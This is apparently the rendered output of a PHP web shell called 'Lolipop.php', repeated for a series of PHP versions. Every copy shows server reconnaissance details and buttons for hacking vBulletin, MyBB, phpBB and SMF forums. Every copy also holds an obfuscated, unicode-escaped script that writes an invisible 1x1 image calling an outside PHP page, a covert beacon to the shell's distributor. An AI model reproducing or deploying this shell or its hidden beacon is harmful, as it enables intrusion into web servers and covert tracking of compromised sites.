<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.10</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.9
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.9</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.8
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.8</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.7
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.7</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.6
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.6</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.5
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.5</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.4
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.4</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.3
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.3</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.2
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.2</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.1
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.1</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.4.45
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.4.45</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script 